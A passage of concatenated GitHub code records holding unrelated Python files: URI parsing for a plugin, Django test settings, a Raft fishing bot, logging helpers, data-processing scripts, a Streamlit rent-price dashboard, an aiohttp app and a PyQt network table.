None\n","repo_name":"linty1997/discord-AngelaMatr1x-bot","sub_path":"core/sql.py","file_name":"sql.py","file_ext":"py","file_size_in_byte":4298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"25686826855","text":"from re import finditer, search\nfrom typing import List\nfrom templateframework.metadata import Metadata\nfrom random import randint\n\nCHARACTER_QUERY_PARAM = '?'\nREGEX_GET_PARAMETERS_OF_URI = r'\\{(?P[a-zA-Z]*(-[a-zA-Z]+)*?)\\}'\n\n\ndef run(metadata: Metadata = None):\n inputs_local = metadata.inputs\n inputs_computed = metadata.computed_inputs\n\n uri = inputs_local['uri']\n method = inputs_computed['method_sanitized']\n resource_request = inputs_computed['resource_request']\n resource_folder_name = inputs_computed['resource_folder_name']\n resource_response = inputs_computed['resource_response']\n \n uri_sanitized = __get_uri_sanitized(uri)\n uri_sanitized_for_test = __generate_uri_sanitized_for_test(uri)\n uri_sanitized_without_query_parms = __get_uri_without_query_parms(uri_sanitized)\n uri_contain_resource_id = __uri_contain_resource_id(uri)\n should_response_as_list = __should_response_as_list(uri_contain_resource_id, method)\n contain_resource_parameter = __should_contain_resource_parameter(method)\n should_response_data = __should_response_data(method)\n\n metadata.computed_inputs['parameters'] = __get_parameters(uri, resource_request, resource_folder_name, contain_resource_parameter)\n metadata.computed_inputs['uri_contain_resource_id'] = uri_contain_resource_id\n metadata.computed_inputs['should_response_as_list'] = should_response_as_list\n metadata.computed_inputs['contain_resource_parameter'] = contain_resource_parameter\n metadata.computed_inputs['should_response_data'] = should_response_data\n metadata.computed_inputs['uri_sanitized'] = uri_sanitized\n metadata.computed_inputs['uri_sanitized_for_test'] = uri_sanitized_for_test\n metadata.computed_inputs['uri_sanitized_without_query_parms'] = uri_sanitized_without_query_parms\n metadata.computed_inputs['resource_response_full_sanitized'] = f'List[{resource_response}]' if should_response_as_list else resource_response\n\n return metadata\n\n\ndef __get_parameters(\n uri,\n resource_request,\n resource_folder_name,\n contain_resource_parameter) -> List[str]:\n uri_params_groups = finditer(r'\\{(?P([a-z]+(-[a-z]*)+)|[a-z]+)\\}', uri)\n parameters = []\n\n if uri_params_groups:\n for uri_param_group in uri_params_groups:\n parameter = uri_param_group.group('parameter')\n\n if __is_query_parameter(uri, parameter):\n parameter = __get_query_parameter_name_of_value(uri, parameter)\n\n parameter = parameter.replace('-', '_')\n\n parameters.append((parameter, 'str'))\n\n if contain_resource_parameter:\n parameters.append((resource_folder_name, resource_request))\n\n return parameters\n\n\ndef __is_query_parameter(uri, parameter_value):\n try:\n index_character_query_param = __get_query_param_index(uri)\n index_of_parameter = uri.index(f'{{{parameter_value}}}')\n return index_of_parameter > index_character_query_param\n except:\n return 0\n\n\ndef __get_query_parameter_name_of_value(uri, parameter_value):\n index_character_query_param = __get_query_param_index(uri)\n uri_query_parameters = uri[index_character_query_param+1:]\n parameters = uri_query_parameters.split('&')\n parameter_value_with_braces = f'={{{parameter_value}}}'\n for parameter in parameters:\n if parameter_value in parameter:\n return parameter.replace(parameter_value_with_braces, '')\n return ''\n\n\ndef __get_uri_sanitized(uri: str) -> str:\n ocurrences = finditer(REGEX_GET_PARAMETERS_OF_URI, uri)\n for ocurrence in ocurrences:\n parameter_not_sanitized = ocurrence.group('parameter')\n parameter_sanitized = parameter_not_sanitized.replace('-', '_')\n uri = uri.replace(parameter_not_sanitized, parameter_sanitized)\n \n uri = uri.replace('amp;', '')\n\n return uri\n\ndef __generate_uri_sanitized_for_test(uri: str) -> str:\n ocurrences = finditer(REGEX_GET_PARAMETERS_OF_URI, uri)\n for ocurrence in ocurrences:\n parameter_not_sanitized = ocurrence.group('parameter')\n number_replacement = randint(1, 200)\n uri = uri.replace(f'{{{parameter_not_sanitized}}}', str(number_replacement))\n\n return uri\n \ndef __should_response_as_list(\n uri_contain_resource_id: bool,\n method: str) -> bool:\n return not uri_contain_resource_id and method == 'get'\n\n\ndef __should_contain_resource_parameter(method: str) -> bool:\n return method in ['post', 'put', 'patch']\n\n\ndef __should_response_data(method: str) -> bool:\n return method != 'delete'\n\n\ndef __get_uri_without_query_parms(uri) -> str:\n return uri[:__get_query_param_index(uri)] if __contain_query_params(uri) != -1 else uri\n\n\ndef __contain_query_params(uri) -> bool:\n return uri.find(CHARACTER_QUERY_PARAM)\n\n\ndef __get_query_param_index(uri) -> int:\n return uri.index(CHARACTER_QUERY_PARAM)\n\n\ndef __uri_contain_resource_id(uri):\n uri_without_query_params = __get_uri_without_query_parms(uri)\n\n return search(r'(?P\\/{[a-zA-Z]*(-[a-zA-Z]*)*}$)', uri_without_query_params) is not None\n\n","repo_name":"stack-spot/stackspot-python-stack","sub_path":"lambda-endpoint-create-plugin/scripts/extract_data_from_inputs.py","file_name":"extract_data_from_inputs.py","file_ext":"py","file_size_in_byte":5124,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"27"} +{"seq_id":"41857858700","text":"# -*- coding: utf-8\nfrom __future__ import unicode_literals, absolute_import\n\nimport django\n\nDEBUG = True\nUSE_TZ = True\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = \"f(xj&4v)k!4qtr2@^h4_yz-p5uvo(k(-9r%k_8xwwy=3t0u=@$\"\n\nDATABASES = {\n \"default\": {\n \"ENGINE\": \"django.db.backends.sqlite3\",\n \"NAME\": \":memory:\",\n }\n}\n\nROOT_URLCONF = \"tests.urls\"\n\nINSTALLED_APPS = [\n \"django.contrib.auth\",\n \"django.contrib.contenttypes\",\n \"django.contrib.sites\",\n \"django_rest_framework_choices\",\n]\n\nSITE_ID = 1\n\nif django.VERSION >= (1, 10):\n MIDDLEWARE = ()\nelse:\n MIDDLEWARE_CLASSES = ()\n","repo_name":"An4ik/django-rest-framework-choices","sub_path":"tests/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"16110235870","text":"import win32gui\nimport win32ui\nfrom ctypes import windll\nfrom PIL import Image\nfrom PIL import ImageChops\nimport pyvda\nimport pyautogui\nimport time\nimport win32api\nimport win32con\nfrom cv2 import cv2\nimport numpy\n\nWND_TITLE = 'Raft'\nPATTERN_PATH = 'pattern.png'\n\ndef send_mouse_click(hwnd, mouse_pos, delay):\n mouse_pos = win32api.MAKELONG(mouse_pos[0], mouse_pos[1])\n win32gui.SendMessage(hwnd, win32con.WM_LBUTTONDOWN, win32con.MK_LBUTTON, mouse_pos)\n time.sleep(delay)\n win32gui.SendMessage(hwnd, win32con.WM_LBUTTONUP, 0, mouse_pos) \n\npattern = Image.open(PATTERN_PATH).convert('RGB')\nopen_cv_pattern = cv2.cvtColor(numpy.array(pattern), cv2.COLOR_RGB2BGR)\n\nhwnd = win32gui.FindWindow(None, WND_TITLE)\n\nwhile True:\n left, top, right, bot = win32gui.GetWindowRect(hwnd)\n w = right - left\n h = bot - top\n\n hwndDC = win32gui.GetWindowDC(hwnd)\n mfcDC = win32ui.CreateDCFromHandle(hwndDC)\n saveDC = mfcDC.CreateCompatibleDC()\n\n saveBitMap = win32ui.CreateBitmap()\n saveBitMap.CreateCompatibleBitmap(mfcDC, w, h)\n\n saveDC.SelectObject(saveBitMap)\n\n result = windll.user32.PrintWindow(hwnd, saveDC.GetSafeHdc(), 0)\n\n bmpinfo = saveBitMap.GetInfo()\n bmpstr = saveBitMap.GetBitmapBits(True)\n\n im = Image.frombuffer(\n 'RGB',\n (bmpinfo['bmWidth'], bmpinfo['bmHeight']),\n bmpstr, 'raw', 'BGRX', 0, 1)\n\n win32gui.DeleteObject(saveBitMap.GetHandle())\n saveDC.DeleteDC()\n mfcDC.DeleteDC()\n win32gui.ReleaseDC(hwnd, hwndDC)\n\n if result == 1:\n open_cv_im = cv2.cvtColor(numpy.array(im), cv2.COLOR_RGB2BGR)\n result = cv2.matchTemplate(open_cv_pattern, open_cv_im, cv2.TM_CCOEFF_NORMED)\n \n threshold = .95\n loc = numpy.where(result >= threshold)\n found_x, found_y = loc[1], loc[0]\n \n #OLD CODE\n #selected_area = im.crop((FROM_PIXEL[0], FROM_PIXEL[1], TO_PIXEL[0], TO_PIXEL[1])).convert('RGB')\n #diff = ImageChops.difference(pattern, selected_area)\n #if #not diff.getbbox():\n\n if len(found_x) > 0 and len(found_y) > 0: \n is_valid_x = False\n is_valid_y = False\n\n for x in found_x:\n if abs(x - w/2) < 100:\n is_valid_x = True\n\n for y in found_y:\n if abs(y - h/2) < 100:\n is_valid_y = True\n\n if is_valid_x and is_valid_y:\n #OLD CODE\n #prev_desk = pyvda.GetCurrentDesktopNumber()\n #pyvda.GoToDesktopNumber(2)\n #win32gui.SetForegroundWindow(hwnd)\n #pyautogui.click(left + 1, top + 1)\n #pyautogui.mouseDown()\n #time.sleep(0.1) \n #pyautogui.mouseUp()\n #pyvda.GoToDesktopNumber(prev_desk) \n\n mouse_pos = (left + 1, top + 1)\n\n send_mouse_click(hwnd, mouse_pos, 0.1)\n time.sleep(0.1)\n send_mouse_click(hwnd, mouse_pos, 1) \n\n print('Catched!')\n\n time.sleep(0.2)","repo_name":"sh1nes-1/RaftBot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"74376207431","text":"from pathlib import Path\nfrom typing import Union\nimport sys\n\nimport logging\n\nformatter = logging.Formatter('%(asctime)s - %(levelname)8s: %(message)s', \"%H:%M:%S\")\nfile_formatter = logging.Formatter('%(asctime)s %(levelname)8s - %(module)10s %(funcName)15s : %(message)s',\n \"%H:%M:%S\")\n\n\nclass LogClass:\n \"\"\"\n Main class to log information to stdout and ASCII logfile.\n\n Note: Logging level is set to DEBUG for file and INFO for stdout\n\n To use:\n ``log = LogClass(logfile).get_logger()``\n\n :param logfile: Filename for log file\n \"\"\"\n\n def __init__(self, logfile: Union[str, Path]):\n self.LOG_FILENAME = logfile\n\n def get_logger(self) -> logging.Logger:\n file_log_level = logging.DEBUG # This is for file logging\n log = logging.getLogger(\"main_logger\")\n if not log.handlers:\n log.setLevel(file_log_level)\n\n sh = logging.StreamHandler(sys.stdout)\n sh.setLevel(logging.INFO) # Only at INFO level\n sh.setFormatter(formatter)\n log.addHandler(sh)\n\n fh = logging.FileHandler(self.LOG_FILENAME)\n fh.setLevel(file_log_level)\n fh.setFormatter(file_formatter)\n log.addHandler(fh)\n\n log.handler_set = True\n log.propagate = False\n return log\n\n\ndef log_stdout() -> logging.Logger:\n \"\"\"Stdout logging\"\"\"\n\n log_level = logging.INFO\n log = logging.getLogger(\"stdout_logger\")\n if not log.handlers:\n log.setLevel(log_level)\n sh = logging.StreamHandler(sys.stdout)\n sh.setFormatter(formatter)\n log.addHandler(sh)\n\n log.handler_set = True\n log.propagate = False\n return log\n","repo_name":"astrochun/academic-ads-bibtex","sub_path":"academic_ads_bibtex/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"27"} +{"seq_id":"5041200600","text":"import numpy as np\nimport pandas as pd\n\ndata = pd.read_csv(\"Data/churn_train_data.csv\", sep=\"\\t\")\nprint(''.join(data['launch_seq'][0].lstrip('[').rstrip(']').split(',')))\nprint(list(map(int, data['launch_seq'][0].lstrip('[').rstrip(']').split(','))))\n\ntemp_array = np.zeros((600001, 32))\nfor i, item in enumerate(data['launch_seq']):\n # temp_array[i] = list(map(int, item.lstrip('[').rstrip(']').split(',')))\n temp_array[i] = item.lstrip('[').rstrip(']').split(',')\nprint(temp_array.dtype)\nprint(temp_array.shape)\ncols = ['launch_seq'+str(i) for i in range(1, 33)]\ntrain = pd.DataFrame(temp_array, columns=cols)\ntrain = pd.concat([data, train], axis=1)\nprint(train)\n\ntemp_array1 = np.zeros((600001, 32))\nfor i, item in enumerate(data['playtime_seq']):\n # temp_array[i] = list(map(int, item.lstrip('[').rstrip(']').split(',')))\n temp_array1[i] = item.lstrip('[').rstrip(']').split(',')\nprint(temp_array1.dtype)\nprint(temp_array1.shape)\ncols = ['playtime_seq'+str(i) for i in range(1, 33)]\ntrain1 = pd.DataFrame(temp_array1, columns=cols)\ntrain = pd.concat([train, train1], axis=1)\nprint(train)\n\ntemp_array2 = np.zeros((600001, 16))\nfor i, item in enumerate(data['duration_prefer']):\n temp_array2[i] = item.lstrip('[').rstrip(']').split(',')\nprint(temp_array2.dtype)\nprint(temp_array2.shape)\ncols = ['duration_prefer'+str(i) for i in range(1, 17)]\ntrain2 = pd.DataFrame(temp_array2, columns=cols)\ntrain = pd.concat([train, train2], axis=1)\nprint(train)\n\ntemp_array3 = np.zeros((600001, 11))\nfor i, item in enumerate(data['interact_prefer']):\n # temp_array[i] = list(map(int, item.lstrip('[').rstrip(']').split(',')))\n temp_array3[i] = item.lstrip('[').rstrip(']').split(',')\nprint(temp_array3.dtype)\nprint(temp_array3.shape)\ncols = ['interact_prefer'+str(i) for i in range(1, 12)]\ntrain3 = pd.DataFrame(temp_array3, columns=cols)\ntrain = pd.concat([train, train3], axis=1)\nprint(train)\ntrain = train.drop(columns=['launch_seq', 'playtime_seq', 'duration_prefer', 'interact_prefer'])\nprint(train)\ntrain.to_csv('Data/churn_data_nosqe.csv', index=False)\n","repo_name":"farmer169/BS-DNN","sub_path":"sequence2single.py","file_name":"sequence2single.py","file_ext":"py","file_size_in_byte":2070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"13308576555","text":"\"\"\"\nFiltering:\n------------------------------------------\n- For all val/train triples (s, p, o):\n - List all o' such that (s, p, o') is in train/val/test set\n - List all s' such that (s', p, o) is in train/val/test set\n\n- Return 2 x (M_val or M_test) x (list of variable lengths)\n\nDuring evaluation:\n------------------------------------------\n- Use these lists for indexing the prediction result and set them to -inf\n so that they will not ranked first.\n\"\"\"\nimport numpy as np\nimport tqdm\nimport argparse\nimport os\n\n\nparser = argparse.ArgumentParser(\n description='Create evaluation filters for YAGO'\n)\n\nparser.add_argument('--load', default=False, action='store_true',\n help='load temp data or not (default: False)')\nparser.add_argument('--dataset', default='yago', metavar='',\n help='which dataset in {`yago`, `fb15k`} to be used? (default: yago)')\n\nargs = parser.parse_args()\n\n\nif args.dataset == 'yago':\n dataset_dir = 'yago3-10-literal'\nelse:\n dataset_dir = 'fb15k-literal'\n\nif not os.path.exists('data/{}/bin/temp/'.format(dataset_dir)):\n os.makedirs('data/{}/bin/temp/'.format(dataset_dir))\n\n\n# Load dict\nidx2ent = np.load('data/{}/bin/idx2ent.npy'.format(dataset_dir))\nn_ent = len(idx2ent)\n\n# Load all datasets\nX_train = np.load('data/{}/bin/train.npy'.format(dataset_dir))\nX_val = np.load('data/{}/bin/val.npy'.format(dataset_dir))\nX_test = np.load('data/{}/bin/test.npy'.format(dataset_dir))\n\ncnt = 1\nM_val = X_val.shape[0]\n\nif args.load:\n idx_s_prime_train = np.load('data/{}/bin/temp/idx_s_prime_train.npy'.format(dataset_dir))\n idx_o_prime_train = np.load('data/{}/bin/temp/idx_o_prime_train.npy'.format(dataset_dir))\n idx_s_prime_val = np.load('data/{}/bin/temp/idx_s_prime_val.npy'.format(dataset_dir))\n idx_o_prime_val = np.load('data/{}/bin/temp/idx_o_prime_val.npy'.format(dataset_dir))\n idx_s_prime_test = np.load('data/{}/bin/temp/idx_s_prime_test.npy'.format(dataset_dir))\n idx_o_prime_test = np.load('data/{}/bin/temp/idx_o_prime_test.npy'.format(dataset_dir))\nelse:\n idx_s_prime_train, idx_o_prime_train = [], []\n idx_s_prime_val, idx_o_prime_val = [], []\n idx_s_prime_test, idx_o_prime_test = [], []\n\n print('Gathering all entity in s and o of all datasets')\n print('-----------------------------------------------')\n\n for e_prime in tqdm.tqdm(range(n_ent)):\n # Train\n idx_s = set(np.where(X_train[:, 0] == e_prime)[0])\n idx_s_prime_train.append(idx_s)\n\n idx_o = set(np.where(X_train[:, 2] == e_prime)[0])\n idx_o_prime_train.append(idx_o)\n\n # Val\n idx_s = set(np.where(X_val[:, 0] == e_prime)[0])\n idx_s_prime_val.append(idx_s)\n\n idx_o = set(np.where(X_val[:, 2] == e_prime)[0])\n idx_o_prime_val.append(idx_o)\n\n # Test\n idx_s = set(np.where(X_test[:, 0] == e_prime)[0])\n idx_s_prime_test.append(idx_s)\n\n idx_o = set(np.where(X_test[:, 2] == e_prime)[0])\n idx_o_prime_test.append(idx_o)\n\n np.save('data/{}/bin/temp/idx_s_prime_train.npy'.format(dataset_dir), idx_s_prime_train)\n np.save('data/{}/bin/temp/idx_o_prime_train.npy'.format(dataset_dir), idx_o_prime_train)\n np.save('data/{}/bin/temp/idx_s_prime_val.npy'.format(dataset_dir), idx_s_prime_val)\n np.save('data/{}/bin/temp/idx_o_prime_val.npy'.format(dataset_dir), idx_o_prime_val)\n np.save('data/{}/bin/temp/idx_s_prime_test.npy'.format(dataset_dir), idx_s_prime_test)\n np.save('data/{}/bin/temp/idx_o_prime_test.npy'.format(dataset_dir), idx_o_prime_test)\n\n print('Done and saved!')\n print()\n\n\ndatasets = ['val', 'test']\n\nfor dataset in datasets:\n print('Begin filtering {} set'.format(dataset))\n print('------------------------------')\n\n filters_s = []\n filters_o = []\n\n X = X_val if dataset == 'val' else X_test\n\n for s, p, o in tqdm.tqdm(X):\n idx_p_train = set(np.where(X_train[:, 1] == p)[0])\n idx_p_val = set(np.where(X_val[:, 1] == p)[0])\n idx_p_test = set(np.where(X_test[:, 1] == p)[0])\n\n idx_sp_train = idx_s_prime_train[s] & idx_p_train\n idx_po_train = idx_p_train & idx_o_prime_train[o]\n idx_sp_val = idx_s_prime_val[s] & idx_p_val\n idx_po_val = idx_p_val & idx_o_prime_val[o]\n idx_sp_test = idx_s_prime_test[s] & idx_p_test\n idx_po_test = idx_p_test & idx_o_prime_test[o]\n\n \"\"\"\n Step:\n -----\n Given (s, p, o')\n 1. Check if it come up in X_train, X_val, and X_test\n 2. If one of them are true then add o'\n Repeat for (s', p, o)\n \"\"\"\n\n s_ents = []\n o_ents = []\n\n for e_prime in range(n_ent):\n # subjects\n idx_spo_train = idx_s_prime_train[e_prime] & idx_po_train\n idx_spo_val = idx_s_prime_val[e_prime] & idx_po_val\n idx_spo_test = idx_s_prime_test[e_prime] & idx_po_test\n\n if len(idx_spo_train | idx_spo_val | idx_spo_test):\n s_ents.append(e_prime)\n\n # objects\n idx_spo_train = idx_sp_train & idx_o_prime_train[e_prime]\n idx_spo_val = idx_sp_val & idx_o_prime_val[e_prime]\n idx_spo_test = idx_sp_test & idx_o_prime_test[e_prime]\n\n if len(idx_spo_train | idx_spo_val | idx_spo_test):\n o_ents.append(e_prime)\n\n # Contains subject/object entities to be ignored for this validation tripl\n filters_s.append(s_ents)\n filters_o.append(o_ents)\n\n # Save filters\n np.save('data/{}/bin/filter_s_{}.npy'.format(dataset_dir, dataset), filters_s)\n np.save('data/{}/bin/filter_o_{}.npy'.format(dataset_dir, dataset), filters_o)\n\n print('Done!')\n print()\n\nprint('All done and saved!')\n","repo_name":"nilesh-c/KGE-Literals-copy","sub_path":"data_preparation/create_evaluation_filter.py","file_name":"create_evaluation_filter.py","file_ext":"py","file_size_in_byte":5719,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"27"} +{"seq_id":"73043577353","text":"import pandas as pd\r\nimport numpy as np\r\nfrom datetime import date, datetime\r\nimport plotly.express as px\r\nimport streamlit as st\r\n\r\nclass PriceTimeSeries:\r\n\r\n TODAY = np.datetime64(date.today())\r\n FULL_CALENDAR = pd.DataFrame(pd.date_range(start=\"2023-01-01\", end=TODAY), columns=['datetime'])\r\n REGIONI = (\r\n 'Abruzzo', 'Basilicata', 'Calabria', 'Campania', 'Emilia-Romagna',\r\n 'Friuli-Venezia Giulia', 'Lazio', 'Liguria', 'Lombardia', 'Marche',\r\n 'Molise', 'Piemonte', 'Puglia', 'Sardegna', 'Sicilia', 'Toscana',\r\n 'Veneto', 'Valle-D-Aosta', 'Trentino-Alto-Adige'\r\n )\r\n\r\n def __init__(self,\r\n df_path=\"dataframes/italy_housing_price_rent_clean.parquet.gzip\"):\r\n self.df_path = df_path\r\n\r\n def load_data(self):\r\n return pd.read_parquet(self.df_path)\r\n\r\n def clean_datetime(self, df):\r\n df = df.loc[(df['datetime'] > '2023-01-01') & (df['datetime'] < self.TODAY)]\r\n df = pd.merge(df, self.FULL_CALENDAR, how='outer', on='datetime')\r\n return df\r\n\r\n def select_time_range(self, df, time_start, time_end):\r\n df = df.loc[(df['datetime'] >= time_start) & (df['datetime'] <= time_end)]\r\n return df\r\n\r\n def get_week_and_month(self, df):\r\n df['week'] = df['datetime'].dt.to_period('W').dt.start_time\r\n df['month'] = df['datetime'].dt.to_period('M').dt.start_time\r\n return df\r\n\r\n def sidebar_select_time_range(self):\r\n today_string = np.datetime_as_string(self.TODAY, unit='D')\r\n start_time = datetime.strptime(\"2023-01-01\", \"%Y-%m-%d\")\r\n end_time = datetime.strptime(today_string, \"%Y-%m-%d\")\r\n date_values = st.slider('SELECT A DATE RANGE',\r\n min_value=start_time,\r\n max_value=end_time,\r\n value=(start_time, end_time),\r\n format=\"YYYY-MM-DD\")\r\n return date_values[0], date_values[1]\r\n\r\n def clean_data(self, df, time_start='2023-01-01', time_end=TODAY):\r\n df = self.clean_datetime(df)\r\n df = self.get_week_and_month(df)\r\n df = self.select_time_range(df, time_start, time_end)\r\n return df\r\n\r\n def sidebar_select_seasonality(self):\r\n seasonality = st.sidebar.selectbox('Select a period', ['day', 'week', 'month'])\r\n if seasonality == 'day':\r\n seasonality = 'datetime'\r\n return seasonality\r\n\r\n def slider_price_limit(self):\r\n price_limit = st.slider('Select a maximum price',\r\n min_value=0, max_value=20000,\r\n value=(0, 5000))\r\n return price_limit[1]\r\n\r\n def plot_time_series(self, df, period, title, area=None):\r\n fig = px.line(df, x=period, y='prezzo',\r\n color=area,\r\n hover_data=[area],\r\n color_discrete_sequence=px.colors.qualitative.Pastel,\r\n template=\"plotly_white\",\r\n width=1000, height=600,\r\n )\r\n fig.update_layout(xaxis_title=\"Date\", yaxis_title=\"Price (euros)\",\r\n title={'text': title,'font': {'size': 24} }\r\n )\r\n st.plotly_chart(fig)\r\n\r\n def plot_average_italy(self, df, period, max_price=5000):\r\n avg_italy = self.get_week_and_month(df)\r\n avg_italy = avg_italy.groupby([period])['prezzo'].mean().reset_index()\r\n avg_italy = avg_italy.loc[avg_italy['prezzo'] <= max_price]\r\n self.plot_time_series(avg_italy, period, 'AVERAGE PRICE IN ITALY')\r\n\r\n def sidebar_select_regions(self):\r\n with st.sidebar:\r\n REGIONS_SELECTED = st.multiselect('Select regions', self.REGIONI, default=[\"Lombardia\"])\r\n return REGIONS_SELECTED\r\n\r\n def plot_average_by_region(self, df, period, regions, max_price=5000):\r\n avg_by_region = self.get_week_and_month(df)\r\n avg_by_region = avg_by_region.loc[df['regione'].str.title().isin(regions)]\r\n avg_by_region = avg_by_region.groupby([period, 'regione'])['prezzo'].mean().reset_index()\r\n avg_by_region = avg_by_region.loc[avg_by_region['prezzo'] < max_price]\r\n self.plot_time_series(avg_by_region, period, 'AVERAGE PRICE BY REGION', 'regione')\r\n\r\n def sidebar_select_municipalities(self):\r\n df = self.load_data()\r\n with st.sidebar:\r\n MUNICIPALITIES_SELECTED = st.multiselect('Select cities', df['citta'].unique(), default=[\"Milano\"])\r\n return MUNICIPALITIES_SELECTED\r\n\r\n def plot_average_by_municipality(self, df, period, municipalities, max_price=5000):\r\n avg_by_municipality = self.get_week_and_month(df)\r\n avg_by_municipality = avg_by_municipality.loc[df['citta'].str.title().isin(municipalities)]\r\n avg_by_municipality = avg_by_municipality.groupby([period, 'citta'])['prezzo'].mean().reset_index()\r\n avg_by_municipality = avg_by_municipality.loc[avg_by_municipality['prezzo'] < max_price]\r\n self.plot_time_series(avg_by_municipality, period, 'AVERAGE PRICE BY CITY', 'citta')\r\n\r\n def sidebar_select_city(self):\r\n df = self.load_data()\r\n with st.sidebar:\r\n CITY = st.selectbox('SELECT ONE CITY', df['citta'].unique())\r\n st.write('You selected:', CITY)\r\n return CITY\r\n\r\n def sidebar_select_neighbourhoods(self, municipality):\r\n df = self.load_data()\r\n df = df.loc[df['citta'].str.title() == municipality][['prezzo', 'quartiere', 'citta', 'regione']]\r\n freq = df['quartiere'].value_counts().sort_values(ascending=False)[0:5]\r\n with st.sidebar:\r\n NEIGHBOURHOODS_SELECTED = st.multiselect('Select neighbourhoods', list(df['quartiere'].unique()), default=list(freq.index))\r\n return NEIGHBOURHOODS_SELECTED\r\n\r\n def plot_average_by_neighbourhoods(self, df, period, city, neighbourhoods, max_price=5000):\r\n avg_by_neighborhood = self.get_week_and_month(df)\r\n avg_by_neighborhood = avg_by_neighborhood.loc[df['citta'].str.title() == city]\r\n avg_by_neighborhood = avg_by_neighborhood.loc[df['quartiere'].str.title().isin(neighbourhoods)]\r\n avg_by_neighborhood = avg_by_neighborhood.groupby([period, 'quartiere'])['prezzo'].mean().reset_index()\r\n avg_by_neighborhood = avg_by_neighborhood.loc[avg_by_neighborhood['prezzo'] < max_price]\r\n self.plot_time_series(avg_by_neighborhood, period, 'AVERAGE PRICE BY NEIGHBOURHOODS', 'quartiere')\r\n\r\n def main(self, period, regions, municipalities, city, neighbourhoods, max_price=5000, time_start=\"01-01-2023\", time_end=TODAY):\r\n df = self.load_data()\r\n df = self.clean_data(df, time_start, time_end)\r\n\r\n #st.write(\"#### **AVERAGE PRICE IN ITALY\")\r\n self.plot_average_italy(df, period, max_price)\r\n st.write('-'*20)\r\n\r\n #st.write(\"#### **AVERAGE PRICE PER REGION\")\r\n self.plot_average_by_region(df, period, regions, max_price)\r\n st.write('-'*20)\r\n\r\n #st.write(\"#### **AVERAGE PRICE IN MUNICIPALITY\")\r\n self.plot_average_by_municipality(df, period, municipalities, max_price)\r\n st.write('-'*20)\r\n\r\n #st.write(\"#### **AVERAGE PRICE PER NEIGHBORHOOD\")\r\n self.plot_average_by_neighbourhoods(df, period, city, neighbourhoods, max_price)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"tommella90/italy-housing-prices","sub_path":"streamlit_app/time_series_analysis.py","file_name":"time_series_analysis.py","file_ext":"py","file_size_in_byte":7373,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"40349306599","text":"from aiohttp import web\nfrom routes_union import setup_routes\nfrom aiohttp_session import session_middleware\nfrom aiohttp_session.cookie_storage import EncryptedCookieStorage\nfrom aiohttp_session import SimpleCookieStorage\nimport hashlib\nfrom settings import *\nfrom middlewares.authorization import authorization\n\n\nasync def init_app(mode='prod'):\n middle = []\n if mode == 'test':\n middle.append(session_middleware(SimpleCookieStorage()))\n else:\n middle.append(session_middleware(EncryptedCookieStorage(hashlib.sha256(bytes(SECRET_KEY, 'utf-8')).digest())))\n\n middle.append(authorization)\n\n app = web.Application(\n middlewares=middle\n )\n setup_routes(app)\n\n return app\n\n\ndef main():\n app = init_app()\n web.run_app(app,\n host='127.0.0.1',\n port=8000)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"motivation-zone/main","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"34959001210","text":"from PyQt5.QtWidgets import QVBoxLayout, QTableWidget, QTableWidgetItem, QSizePolicy, QFrame, QSplitter\r\nfrom PyQt5.QtCore import Qt\r\nfrom dlls.functions import database_all_lookup\r\n\r\n\r\nclass NetTable:\r\n def __init__(self, tab_widget):\r\n self.main_layout = QVBoxLayout()\r\n self.main_layout.setContentsMargins(0, 0, 0, 0)\r\n self.main_layout.setSpacing(0)\r\n tab_widget.setLayout(self.main_layout)\r\n\r\n self.create_table()\r\n\r\n def create_table(self):\r\n separator_frame = QFrame()\r\n separator_frame.setStyleSheet(\"background-color: #414657;\")\r\n separator_frame.setFixedHeight(20)\r\n self.main_layout.addWidget(separator_frame)\r\n\r\n table = QTableWidget()\r\n self.main_layout.addWidget(table)\r\n\r\n column_headers = ['IP Address', 'MAC Address', 'Hostname', 'Status', 'Vendor']\r\n\r\n sample_data = [\r\n ['192.168.1.100', '00:11:22:33:44:55', 'SampleHost1', 'Up', 'Vendor1'],\r\n ['192.168.1.101', 'AA:BB:CC:DD:EE:FF', 'SampleHost2', 'Down', 'Vendor2'],\r\n ['192.168.1.102', '11:22:33:44:55:66', 'SampleHost3', 'Unknown', 'Vendor3'],\r\n ]\r\n\r\n table.setRowCount(len(sample_data) + 100)\r\n table.setColumnCount(len(column_headers))\r\n\r\n for row_idx, row_data in enumerate(sample_data):\r\n for col_idx, cell_value in enumerate(row_data):\r\n item = QTableWidgetItem(str(cell_value))\r\n table.setItem(row_idx, col_idx, item)\r\n item.setFlags(item.flags() & ~Qt.ItemIsEditable)\r\n\r\n # Network table settings\r\n table.verticalHeader().setVisible(False)\r\n table.setHorizontalHeaderLabels(column_headers)\r\n table.setFocusPolicy(Qt.NoFocus)\r\n\r\n table.setColumnWidth(0, 150)\r\n table.setColumnWidth(1, 150)\r\n table.setColumnWidth(2, 150)\r\n table.setColumnWidth(3, 150)\r\n table.setColumnWidth(4, 150)\r\n table.horizontalHeader().setStretchLastSection(True)\r\n table.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)\r\n\r\n # Network table styling\r\n header_style = \"\"\"\r\n QHeaderView::section {\r\n background-color: #414657;\r\n font: yu gothic ui 25px;\r\n padding: 0px;\r\n border-left: 2px solid #000;\r\n color: 